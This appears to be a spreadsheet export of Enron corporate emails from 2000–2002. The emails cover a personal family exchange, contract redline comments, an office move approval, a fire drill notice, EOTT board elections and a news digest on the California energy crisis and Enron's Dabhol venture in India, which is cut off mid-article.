"Germany, Mary/COR" &lt;mgermany@CH2M.com&gt; on 07/07/2000 12:19:49 PM_x000D_
_x000D_
To:   "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
I try and negotiate that for you.  Also, I think you need to think about_x000D_
sharing custody of your son since you will be so close._x000D_
_x000D_
Mary Germany, Manager_x000D_
Accounts Payable_x000D_
Payroll_x000D_
Accounting Support_x000D_
(303) 713-2151_x000D_
fax (303) 846-2151_x000D_
email - mgermany@ch2m.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: July 07, 2000 11:18 AM_x000D_
To: Germany, Mary/COR_x000D_
Subject: RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
_x000D_
Not hardly.  Will she buy me some toys - a motorcycle, let me get my flying_x000D_
licenses, and a cheaper 4 wheel drive vehicle?  I will also need to travel_x000D_
back to Texas once a quarter to vist my family._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Germany, Mary/COR" &lt;mgermany@CH2M.com&gt; on 07/07/2000 12:15:23 PM_x000D_
_x000D_
To:   "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
Hey I think that if you loose 50 lbs, I can make it happen for you.  But_x000D_
you_x000D_
might have to move to Denver.  Is that a problem?_x000D_
_x000D_
Mary Germany, Manager_x000D_
Accounts Payable_x000D_
Payroll_x000D_
Accounting Support_x000D_
(303) 713-2151_x000D_
fax (303) 846-2151_x000D_
email - mgermany@ch2m.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: July 07, 2000 11:14 AM_x000D_
To: Germany, Mary/COR_x000D_
Subject: RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
_x000D_
How's that going anyway?  I forgot I had a marriage "arrangement" in the_x000D_
works!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Germany, Mary/COR" &lt;mgermany@CH2M.com&gt; on 07/07/2000 11:18:47 AM_x000D_
_x000D_
To:   "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
Hey I was working on the proposal to Catherine.  I had dinner with her last_x000D_
night.  I can't do everything at once you know._x000D_
_x000D_
Mary Germany, Manager_x000D_
Accounts Payable_x000D_
Payroll_x000D_
Accounting Support_x000D_
(303) 713-2151_x000D_
fax (303) 846-2151_x000D_
email - mgermany@ch2m.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: July 07, 2000 10:18 AM_x000D_
To: Germany, Mary/COR_x000D_
Subject: Re: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
_x000D_
What about my camera info?????_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 07:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hub agency/my comments</t>
  </si>
  <si>
    <t>David,_x000D_
_x000D_
Please change the date on the draft so that we won't confuse it with the _x000D_
prior drafts._x000D_
_x000D_
I would delete "specifically" from 2.10 (c), and add "or later ratify such _x000D_
transaction" (or something to that effect), just in case they later learn and _x000D_
accept the transaction.  _x000D_
_x000D_
In 2.10 (x), add to "due to an inability to pay, or other credit reason".  In _x000D_
(y), add "or a contractual defense to payment" [could be force majeure, etc]_x000D_
_x000D_
Again in 2.10, third sentence from the end "any interest, penalties, _x000D_
attorneys fees and court costspayable by the Hub Shipper...;_x000D_
_x000D_
3.3  Delete "prior" before "approval", and add "or ratification" in the _x000D_
redlined section on refunds._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 25 Mar 2002 14:45:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ruthann.frausto@enron.com'})</t>
  </si>
  <si>
    <t>RE: Approval of move requests</t>
  </si>
  <si>
    <t>_x000D_
Please approve these requests_x000D_
 -----Original Message-----_x000D_
From: 	Frausto, Ruthann  _x000D_
Sent:	Monday, March 25, 2002 11:43 AM_x000D_
To:	Corman, Shelley_x000D_
Subject:	Approval of move requests_x000D_
_x000D_
We received a request to move you and Kevin Hyatt to ECN3902 and 3903, respectively. The cost should be approximately $500._x000D_
_x000D_
Please advise if you approve this request._x000D_
_x000D_
Thank you._x000D_
_x000D_
Ruthann_x000D_
x54212</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 16:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Agent Accknowledgement Document</t>
  </si>
  <si>
    <t xml:space="preserve">Gerald, let's produce a document for Mexicana that they can send to their supplier(s) that formaly appoints Enron as the agent for invoice, nominations and day to day logistics. _x000D_
_x000D_
Set this document up as a standard form on non-Enron letterhead and we can forward to them to use with their supply._x000D_
_x000D_
call if any questions. _x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 14:28:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Fire Drill Scheduled</t>
  </si>
  <si>
    <t>As required by the Houston Fire Department, a fire drill has been scheduled for the Enron Center Campus._x000D_
_x000D_
_x000D_
	Enron Center North, 1400 Smith St., approximately  3:15 PM on Thursday, December 20th, 2001_x000D_
_x000D_
	Enron Center South, 1500 Louisiana St., approximately 3:45 PM on Thursday, December 20th, 2001_x000D_
_x000D_
Please advise all clients, contractors, and visitors that this will be a fire drill only. The fire alarm will sound at 3:15 PM in Enron Center North and 3:45 PM in Enron Center South. You will be asked to go to the stairwell and standby.  Do not go into the stairwell.  Further instructions will be given over the public address system.  If you experience any difficulties in hearing either the fire alarm or any announcements over the public address system, please notify the Facilities Help Desk by e-mail at facilitieshelpdesk1@enron.com. _x000D_
_x000D_
Anyone that is mobility impaired or medically disabled may be excused from participating in this drill by sending an e-mail to Harry Grubbs. _x000D_
_x000D_
If you have any questions or need any additional information, please contact Harry Grubbs at 713-853-5417.</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'britt.davis@enron.com', 'michael.moran@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.. This will be one of the topics this pm.  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 11/03/2000 _x000D_
10:55 AM ---------------------------_x000D_
_x000D_
_x000D_
Charlie Graham_x000D_
11/03/2000 09:51 AM_x000D_
To: Michel Nelson/ET&amp;S/Enron@ENRON_x000D_
cc: Rockey Storie/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON, Mike Ullom/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: _x000D_
_x000D_
Mike,_x000D_
_x000D_
Finally talked to Steve Winston.  Oneok will meet with us in Omaha on the _x000D_
afternoon of Monday November 20th.  They will bring representatives from _x000D_
Business Development, Engineering, and Operations but no attorney's.  The _x000D_
meeting will be limited to CO2 mitigation.  They would like us to provide _x000D_
them with:  1) all facility or operational alternatives that we have or would _x000D_
considered including their cost, and what we would charge to provide them as _x000D_
a service,  and 2) any contractual or tariff actions we could take (like _x000D_
getting the CIG gas receipt moved to Dumas). _x000D_
_x000D_
Steve indicated that Prax Air (s.p.?) is challenging Oneok's "force majeure" _x000D_
contention and is holding Oneok accountable for nonperformance.  Steve will _x000D_
fax me a copy of the notice they received if Oneok's attorney's approve.  _x000D_
Steve also indicated that since the CO2 level has come down this month, they _x000D_
will try to put the Helium plant back on today._x000D_
_x000D_
Charlie_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ClickPaper Approval for 9/21/00</t>
  </si>
  <si>
    <t xml:space="preserve">You're welcome._x000D_
_x000D_
_x000D_
_x000D_
	Camille Gerard@ENRON_x000D_
	09/22/2000 05:16 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: ClickPaper Approval for 9/21/00_x000D_
_x000D_
Thanks!!_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 May 2000 04:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'walt.zimmerman@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'steve.duffy@enron.com'})</t>
  </si>
  <si>
    <t>Annual Election of EOTT Directors and Committees</t>
  </si>
  <si>
    <t xml:space="preserve">EOTT's bylaws currently require that we have a Chairman of the Board.  As a _x000D_
result of amendments to the bylaws that were made in 1994, the duties of the _x000D_
Chairman of the Board are quite limited.  The bylaws provide that "the _x000D_
Chairman of the Board shall preside at all meetings of the stockholders and _x000D_
of the Board of Directors.  The Chairman of the Board shall act as a liaison _x000D_
between the officers of the Corporation and the Board of Directors."_x000D_
_x000D_
_x000D_
_x000D_
	Steve Duffy_x000D_
	05/05/2000 10:59 AM_x000D_
		_x000D_
		 To: Michael Burke/Houston/Eott@Eott_x000D_
		 cc: Stanley Horton/Corp/Enron@Enron, Walt Zimmerman/Houston/Eott@Eott_x000D_
		 Subject: Re: Annual Election of EOTT Directors and Committees_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Ted Gaylord has advised that he no longer wishes to serve as Board Chairman, _x000D_
although he does intend to remain on the Board.  There appear to be no other _x000D_
changes.  Suggest the four of us discuss the " Board Chairman"  situation as _x000D_
soon as possible. I have a call into Baird to explore (1) whether we need a _x000D_
Board Chairman per se, and (2) whether there will be any "disclosure" issues _x000D_
around Ted stepping down as Board Chairman.  SWD_x000D_
_x000D_
_x000D_
_x000D_
	Michael Burke_x000D_
	05/05/2000 09:14 AM_x000D_
		_x000D_
		 To: Walt Zimmerman/Houston/Eott@Eott_x000D_
		 cc: Stanley Horton/Corp/Enron@Enron, Steve Duffy/Houston/Eott@Eott_x000D_
		 Subject: Re: Annual Election of EOTT Directors and Committees_x000D_
_x000D_
Walt, I am not aware of any Board changes being considered but you should _x000D_
call Stan and Ted to see if they have any suggestions._x000D_
I would like to see a draft today._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Walt Zimmerman_x000D_
	05/04/00 06:49 PM_x000D_
		 _x000D_
		 To: Michael Burke/Houston/Eott@Eott_x000D_
		 cc: Stanley Horton/Corp/Enron@Enron, Steve Duffy/Houston/Eott@Eott_x000D_
		 Subject: Annual Election of EOTT Directors and Committees_x000D_
_x000D_
Prior to the distribution of materials for the May 15 EOTT Board of Directors _x000D_
meeting, the sole shareholder (Enron Liquids Holding Corp.) needs to reelect _x000D_
EOTT's Board of Directors.  This will be accomplished by a written consent _x000D_
that will be executed on behalf of Enron Liquids Holding Corp._x000D_
_x000D_
Also, at the May 15 meeting, EOTT's directors will elect the members of the _x000D_
Audit Committee and the Compensation Committee for the next year._x000D_
_x000D_
Are you aware of any changes to the EOTT Board, the Audit Committee, or the _x000D_
Compensation Committee?  In some past years, Ted Gaylord has polled the _x000D_
outside directors to ensure that they intended to continue their service on _x000D_
EOTT's Board and committees.  If you would like, I will ask Ted to poll the _x000D_
outside directors again this year as to their intentions for continued _x000D_
service._x000D_
_x000D_
Also, we need to start preparing an agenda for the May 15 meeting.  If you _x000D_
would like, I will forward to you tomorrow a draft agenda that is based on _x000D_
last year's "annual meeting" agenda._x000D_
_x000D_
Please let me know your thoughts on these matters.   Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 00:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Blame Game Yields No Score --- Probes Reveal Little Evidence _x000D_
Suppliers Acted Illegally_x000D_
The Wall Street Journal, 05/22/01_x000D_
_x000D_
Enron Unit Moves to End India Contract For Power_x000D_
The New York Times, 05/22/01_x000D_
_x000D_
The State GOP Criticizes Davis' Choice of PR Aides Capitol: Legislative _x000D_
leaders call the pair political operatives who are too partisan to represent _x000D_
the state during energy crisis._x000D_
Los Angeles Times, 05/22/01_x000D_
_x000D_
BUSINESS DIGEST_x000D_
The New York Times, 05/22/01_x000D_
_x000D_
World Watch_x000D_
The Wall Street Journal, 05/22/01_x000D_
_x000D_
IN BRIEF / ENERGY Enron Withdraws from Qatar Project_x000D_
Los Angeles Times, 05/22/01_x000D_
_x000D_
INDIA: UPDATE 1-Indian state spurred by Enron reopens power deals._x000D_
Reuters English News Service, 05/22/01_x000D_
_x000D_
INDIA: India utility may slap 4bln rupee fine on Enron unit._x000D_
Reuters English News Service, 05/22/01_x000D_
_x000D_
IXEurope creates a Storm in colocation_x000D_
M2 Presswire, 05/22/01_x000D_
_x000D_
Power corrupts..._x000D_
The Economic Times, 05/22/01_x000D_
_x000D_
The Godbole findings_x000D_
Business Standard, 05/22/01_x000D_
_x000D_
SMARTMONEY.COM: Power Grab_x000D_
Dow Jones News Service, 05/22/01_x000D_
_x000D_
Malaysian LNG Sales to India Threatened by Enron Power Dispute_x000D_
Bloomberg, 05/22/01_x000D_
_x000D_
LEADER: India unplugged _x000D_
Financial Times; May 22, 2001_x000D_
_x000D_
Enron pulls out of venture drilling in Qatar's waters _x000D_
Houston Chronicle, 05/22/01_x000D_
_x000D_
Enron exploring commodity trading _x000D_
Houston Chronicle, 05/22/01_x000D_
_x000D_
Plains Resources Gets New Officers_x000D_
Houston Chronicle, 05/22/01_x000D_
_x000D_
_x000D_
_x000D_
Economy_x000D_
California Blame Game Yields No Score --- Probes Reveal Little Evidence _x000D_
Suppliers Acted Illegally_x000D_
By John R. Emshwiller_x000D_
Staff Reporter of The Wall Street Journal_x000D_
_x000D_
05/22/2001_x000D_
The Wall Street Journal_x000D_
A2_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
LOS ANGELES -- California may be struggling to keep its lights on, but one _x000D_
thing there is no shortage of is accusations over who is to blame for an _x000D_
electricity crisis that has sent power prices skyrocketing. _x000D_
In recent days, top California officials have stepped up their rhetoric _x000D_
against a handful of merchant power companies, many of them Texas-based, that _x000D_
supply the state with much of its juice. Gov. Gray Davis says companies such _x000D_
as Reliant Energy Inc., of Houston, have engaged in "unconscionable price _x000D_
gouging." Loretta Lynch, president of the California Public Utilities _x000D_
Commission and a Davis appointee, proclaims that a "cartel" of electricity _x000D_
producers has created artificial shortages. Lt. Gov. Cruz Bustamante is _x000D_
backing a bill that would make energy price fixing a felony, and as a private _x000D_
citizen he is suing several major power producers in Los Angeles state court._x000D_
About half a dozen investigations are being conducted by entities ranging _x000D_
from state legislative committees to the California attorney general's _x000D_
office. So far, these probes -- some of which have been under way for months _x000D_
-- haven't yet yielded either civil or criminal charges. _x000D_
While the energy suppliers are generating "unconscionable profits," the _x000D_
question remains "whether they are illegal profits," says California Attorney _x000D_
General Bill Lockyer, who has offered rewards of as much as hundreds of _x000D_
millions of dollars for information about lawbreaking in the energy business. _x000D_
Mr. Lockyer says he believes his office will eventually file civil charges _x000D_
against suppliers. He would very much like to add criminal counts. "I would _x000D_
love to personally escort [Enron Corp. Chairman Kenneth] Lay to an 8 x 10 _x000D_
cell that he could share with a tattooed dude who says `Hi my name is Spike, _x000D_
honey,'" adds Mr. Lockyer. Houston-based Enron is a major energy-trading _x000D_
company. Like other such firms, Enron has denied wrongdoing in the California _x000D_
market. _x000D_
Mark Palmer, Enron's vice president for corporate communications, said Mr. _x000D_
Lockyer's comment about Mr. Lay "is so counterproductive that it doesn't _x000D_
merit a response." _x000D_
Investigators and academics say there is abundant evidence that individual _x000D_
firms have been exercising "market power." This term is used to denote _x000D_
efforts to influence wholesale-electricity prices, such as by withholding _x000D_
supplies. The California Independent System Operator, or ISO, which manages _x000D_
the state's electric transmission grid, estimates that by exercising market _x000D_
power, suppliers may have added about $6.8 billion to the cost of electricity _x000D_
in the state since early last year. _x000D_
A single firm exercising such power isn't necessarily illegal, says Severin _x000D_
Borenstein, director of the University of California Energy Institute. If a _x000D_
company is a large supplier in the state and "you're not exercising market _x000D_
power, you are not doing your job" on behalf of shareholders, he says. _x000D_
Mr. Borenstein and others say that there are steps that should be taken _x000D_
against suppliers. They note that under federal power law, the Federal Energy _x000D_
Regulatory Commission can order refunds for wholesale prices that are above _x000D_
"just and reasonable" levels. So far, FERC has tentatively ordered California _x000D_
suppliers to make tens of millions of dollars of such refunds, as part of _x000D_
that agency's ongoing inquiry into the California market. Critics of the _x000D_
suppliers and FERC say the refunds should be in the billions of dollars. _x000D_
The power industry, not surprisingly, says there is nothing to accusations of _x000D_
price manipulation or collusion. Executives point to a botched _x000D_
state-utility-deregulation plan that relies heavily on volatile spot-market _x000D_
purchases. Suppliers note that over the past decade, California didn't build _x000D_
enough new power plants to keep up with demand growth. The allegations of _x000D_
manipulation are "a lot of sound and fury and they won't produce anything," _x000D_
says Gary Ackerman, executive director of the Western Power Trading Forum, an _x000D_
industry trade group. _x000D_
Power generators also point to sharp increases in some of their costs, _x000D_
particularly natural gas, which is a major power-plant fuel. This rise in _x000D_
natural-gas prices also has set off a flurry of investigations over possible _x000D_
manipulation. One such case, involving El Paso Corp., Houston, is the subject _x000D_
of probes by federal and state officials. El Paso denies any wrongdoing. _x000D_
While power-industry officials say they have been cooperating with the _x000D_
investigations, law-enforcement officials say they have hit some roadblocks. _x000D_
For instance, Mr. Lockyer's office has gone to San Francisco state court to _x000D_
enforce subpoenas against Reliant, Houston-based Dynegy Inc., and Southern _x000D_
Co. and Mirant Corp., both of Atlanta, after the companies resisted turning _x000D_
over certain business documents they deemed confidential. _x000D_
Investigators have zeroed in on the increased frequency with which plants are _x000D_
going out of service for unscheduled outages. At times, several thousand _x000D_
fewer megawatts of capacity are available than a year ago. A thousand _x000D_
megawatts can power about one million homes. _x000D_
Generators say that this increased "forced outage" rate shows that tight _x000D_
supplies over the past year have required them to run plants, some of them _x000D_
more than 40 years old, for long periods without routine maintenance. This _x000D_
combination has produced more breakdowns. "Plants have been running flat _x000D_
out," says Tom Williams, a spokesman for Duke Energy Co., Charlotte, N.C., _x000D_
which says that its California power plants produced 50% more electricity in _x000D_
2000 than in 1999. _x000D_
At the same time, during periods of lower demand, the number of unplanned _x000D_
outages often seems to rise enough to keep supplies tight, says Frank Wolak, _x000D_
a Stanford University professor and chairman of the ISO's market surveillance _x000D_
committee. "Clearly, something is going on here." However, he and others say _x000D_
that it is almost impossible to tell why a particular pipe failed or whether _x000D_
such a failure was a legitimate reason to reduce output. _x000D_
Some of the most intriguing evidence to date about forced outages surfaced in _x000D_
a federal case. FERC officials said an investigation had raised questions _x000D_
about whether two major power companies had taken plants out of service in _x000D_
order to reap higher electricity prices. The charges against AES Corp., _x000D_
Arlington, Va., which owns the plants, and Williams Cos., Tulsa, Okla., which _x000D_
markets their output, asserted that those actions allowed the companies to _x000D_
reap an extra $10.8 million in revenue. _x000D_
In one instance, according to case filings, a Williams employee "indicated" _x000D_
to AES officials that his firm wouldn't financially penalize AES for _x000D_
extending an outage at one plant. This conversation, which was voluntarily _x000D_
divulged by Williams, could be an indication of collusion. Williams and AES _x000D_
settled the case without admitting any wrongdoing by paying back $8 million _x000D_
to the ISO and by taking certain other measures. A Williams spokeswoman says _x000D_
the employee who talked to AES was "counseled not to enter into any _x000D_
conversations of that nature" in the future. _x000D_
Another issue raised by the FERC case touched on maintenance procedures. _x000D_
According to the filings, AES stopped doing a certain procedure to keep its _x000D_
plant's cooling system from getting clogged. The clogging of the system was _x000D_
cited as a reason for one of the forced outages. Mark Woodruff, president of _x000D_
the AES unit that operates the plant in question, says the company _x000D_
substituted what it felt was an equally effective maintenance procedure. _x000D_
If someone was looking to keep supplies tight and prices high, changes in _x000D_
maintenance procedures would be an easy way to ensure that plants, _x000D_
particularly old ones, have frequent forced outages, says a senior _x000D_
utility-industry executive. By restricting maintenance resources, he says, an _x000D_
operator can simply allow a plant "to take itself out of service." _x000D_
--- _x000D_
Journal Link: What is California doing to alleviate the energy crisis? See a _x000D_
video report of California State Treasurer Philip Angelides discussing the _x000D_
state's plans, in the online Journal at WSJ.com/JournalLinks. _x000D_
--- Investigations Aplenty_x000D_
_x000D_
In the year since California's energy deregulation plan began_x000D_
resulting in higher prices and even blackouts, a flurry of_x000D_
investigations has gotten under way. Here are the main ones:_x000D_
_x000D_
AGENCY: Federal Energy Regulatory Commission_x000D_
INVESTIGATION: Whether generators are charging more than "just and_x000D_
reasonable" rates as demanded by the Federal Power Act; whether El_x000D_
Paso Corp. used its position as a major natural-gas supplier to the_x000D_
state to illegally drive up the price of fuel used to generate_x000D_
electricity._x000D_
_x000D_
AGENCY: California Public Utilities Commission and the State Attorney _x000D_
General_x000D_
INVESTIGATION: Whether generators and power traders have acted_x000D_
illegally through collusion or other means to artificially inflate_x000D_
electricity prices._x000D_
_x000D_
AGENCY: PUC and California Independent System Operator_x000D_
INVESTIGATION: Whether generation plants were shut down for spurious_x000D_
reasons in order to create supply shortages and, thus, to raise_x000D_
electricity prices._x000D_
_x000D_
AGENCY: California Electricity Oversight Board_x000D_
INVESTIGATION: Whether patterns of bidding and pricing in_x000D_
California's electricity auction indicate collusive or otherwise_x000D_
illegal behavior._x000D_
_x000D_
Sources: state and federal agencies_x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
Business/Financial Desk; Section W_x000D_
Enron Unit Moves to End India Contract For Power_x000D_
By SARITHA RAI_x000D_
_x000D_
05/22/2001_x000D_
The New York Times_x000D_
Page 1, Column 6_x000D_
c. 2001 New York Times Company_x000D_
_x000D_
BANGALORE, India, May 21 -- Fed up with its main customer's refusal to pay _x000D_
its bills, the Enron Corporation's Indian power-generating venture served _x000D_
formal notice on Saturday that it would terminate its power supply contract _x000D_
and pull out. _x000D_
The move by the Dabhol Power Company, 65 percent owned by Enron, starts the _x000D_
clock ticking on a six-month notice period before the contract is voided, _x000D_
during which negotiations to settle the dispute are expected. The $2.9 _x000D_
billion Dabhol project represents the largest single foreign investment in _x000D_
India._x000D_
Separately, Enron said today that it was withdrawing from a pipeline project _x000D_
in Qatar, which would have supplied some gas to Dabhol. The company said that _x000D_
the two steps were unrelated. _x000D_
The Dabhol project has been the subject of a series of wrangles between the _x000D_
company and the governments of India and of the western Indian state of _x000D_
Maharashtra. The state-owned utility company that contracted to buy power _x000D_
from the Dabhol plant has defaulted on some $64 million in unpaid power _x000D_
bills, and has accused Dabhol of charging too much. _x000D_
Dabhol said it was left with little choice but to issue the termination _x000D_
notice after both governments failed to honor their contractual commitments _x000D_
to buy and pay for its output. _x000D_
But in a statement issued over the weekend, Dabhol said it was ''still open _x000D_
to constructive discussion on the solutions.'' The company said a ''lasting _x000D_
and feasible solution'' to the dispute would require that the two governments _x000D_
either honor their obligations to buy Dabhol's power or find other _x000D_
creditworthy buyers to take the power instead. _x000D_
The first phase of the project now generates 740 megawatts of power, and the _x000D_
second phase, adding another 1,444 megawatts of capacity, is scheduled to go _x000D_
on line next month. _x000D_
Under the contract, the termination that Enron has set in motion would oblige _x000D_
the federal and state governments to pay damages to Enron and the lenders _x000D_
that financed the project, possibly as much as $500 million -- the value of a _x000D_
year's output of power plus the project's $300 million in debt -- if it is _x000D_
shut down._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
_x000D_
California; Metro Desk_x000D_
The State GOP Criticizes Davis' Choice of PR Aides Capitol: Legislative _x000D_
leaders call the pair political operatives who are too partisan to represent _x000D_
the state during energy crisis._x000D_
DAN MORAIN_x000D_
TIMES STAFF WRITER_x000D_
_x000D_
05/22/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
B-8_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
_x000D_
SACRAMENTO -- Republican legislative leaders Monday blasted Gov. Gray Davis' _x000D_
decision to spend $30,000 a month in taxpayer money to retain communications _x000D_
consultants known for their highly partisan work. _x000D_
Labeling consultants Mark Fabiani and Chris Lehane as "cut-throat," Senate _x000D_
GOP leader Jim Brulte of Rancho Cucamonga and Assembly Republican leader Dave _x000D_
Cox of Fair Oaks said in a letter to Davis that the hiring "undermines the _x000D_
assertions you have made both publicly and privately throughout this crisis."_x000D_
Davis announced Friday that he retained the duo and that the state will pay _x000D_
them a combined $30,000 a month for at least the next six months. _x000D_
"We're not going to support the hiring of political hacks on government _x000D_
payroll," Brulte said in an interview. "Lehane and Fabiani are very talented. _x000D_
The issue is which payroll is appropriate. . . . These are political _x000D_
opposition research attack dogs. If the governor wants them, he ought to pay _x000D_
for them with his $30-million political war chest." _x000D_
Some consumer advocates also criticized the move, citing the consultants' _x000D_
work on behalf of Southern California Edison. In their private consulting _x000D_
business, Fabiani and Lehane are working to win over public and political _x000D_
support for Davis' $3.5-billion plan to rescue Edison from its financial _x000D_
difficulties. Legislation embodying aspects of the deal is pending in _x000D_
Sacramento. _x000D_
On Monday, Brulte and Cox also complained about the consultants' dual role. _x000D_
"California taxpayers should not be asked to finance political consultants or _x000D_
individuals who have a vested business interest with the state," the letter _x000D_
said. _x000D_
Fabiani and Lehane had worked in the Clinton administration, and in Vice _x000D_
President Al Gore's presidential campaign, where they gained a reputation as _x000D_
attack-oriented operatives. Lehane on Monday defended the governor's decision _x000D_
to use tax money to pay their fees, saying government often hires outside _x000D_
experts and that he and Fabiani will "serve as communications advisors to _x000D_
help the governor fight against these generators." _x000D_
"The Republicans," Lehane added, "ought to be spending time writing letters _x000D_
to George W. Bush to get him to stop the Texas generators from gouging _x000D_
California. . . . That is the real issue here." _x000D_
Davis, meanwhile, returned to California on Monday after a weekend of _x000D_
fund-raisers. He was in Texas on Saturday for a Dallas event that had been _x000D_
scheduled for April 11. It was postponed when Pacific Gas &amp; Electric filed _x000D_
for bankruptcy protection. _x000D_
"There is a very large fund-raising base for Democrats in Texas," Davis' _x000D_
campaign strategist, Garry South, said of the state that is home to some of _x000D_
the generators that Davis has criticized. _x000D_
Davis traveled to Chicago for another fund-raiser Sunday, then met Monday _x000D_
with city officials to discuss how Chicago deals with electrical blackouts. _x000D_
After blackouts crippled downtown Chicago in the summer of 1999, Mayor _x000D_
Richard M. Daley demanded that the city's electricity provider, Commonwealth _x000D_
Edison, give advance notice of power cuts. Customers now sometimes receive _x000D_
warnings two or three days in advance. _x000D_
Davis emerged from the meeting saying "the utilities have got to tell us in _x000D_
advance when they're going to have a planned blackout." _x000D_
It was not, however, readily apparent how Chicago's solutions would translate _x000D_
to California, because its electrical problems are vastly different. Rather _x000D_
than suffering a shortage of electricity throughout the grid like California, _x000D_
Chicago has the more microcosmic ills of an aging system--an obsolete _x000D_
transformer going down, for example, leaving several city blocks in the dark _x000D_
until workers can fix it. _x000D_
* _x000D_
Times staff writer Eric Slater contributed to this story._x000D_
_x000D_
PHOTO: Protester Barbara King shakes a light bulb outside Sacramento office _x000D_
of a lobbyist for energy producer Enron near the Capitol.; ; PHOTOGRAPHER: _x000D_
ROBERT DURELL / Los Angeles Times _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
Business/Financial Desk; Section C_x000D_
BUSINESS DIGEST_x000D_
_x000D_
05/22/2001_x000D_
The New York Times_x000D_
Page 1, Column 1_x000D_
c. 2001 New York Times Company_x000D_
_x000D_
Enron Moves to End India Contract _x000D_
Fed up with its main customer's refusal to pay its bills, Enron's Indian _x000D_
power-generating venture said that it would terminate its power supply _x000D_
contract. [World Business, Section W.] _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
International_x000D_
World Watch_x000D_
Compiled by David I. Oyama_x000D_
_x000D_
05/22/2001_x000D_
The Wall Street Journal_x000D_
A18_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
EUROPE/MIDEAST _x000D_
Insurer Storebrand_x000D_
Favors Sampo's Bid _x000D_
Over Den Norske _x000D_
Norway's largest insurer, Storebrand, became the center of a bidding war _x000D_
between Finnish financial-services company Sampo and Norway's Den Norske _x000D_
Bank, with Storebrand favoring Sampo. Sampo's offer values Storebrand at 20.8 _x000D_
billion Norwegian kroner ($2.3 billion), compared with DnB's 17.6 billion _x000D_
kroner bid, as the Nordic region's top financial companies battle for _x000D_
position in a consolidating sector. Sampo and Storebrand, in a joint Helsinki _x000D_
news conference, said they were confident their deal would succeed. _x000D_
Sampo's cash-and-stock offer, valued at 75 kroner a share, represents a 31% _x000D_
premium to Storebrand's average share price during the past month and was _x000D_
backed by Storebrand's management. DnB wouldn't say whether it would alter _x000D_
its bid. "One cannot count on that," its chairman said. _x000D_
HypoVereinsbank Results Disappoint _x000D_
Bayerische Hypo- und Vereinsbank, Germany's second-largest bank, known as _x000D_
HypoVereinsbank, said first-quarter pretax profit rose 25% from a year _x000D_
earlier to 770 million euros ($678 million), below analysts' consensus _x000D_
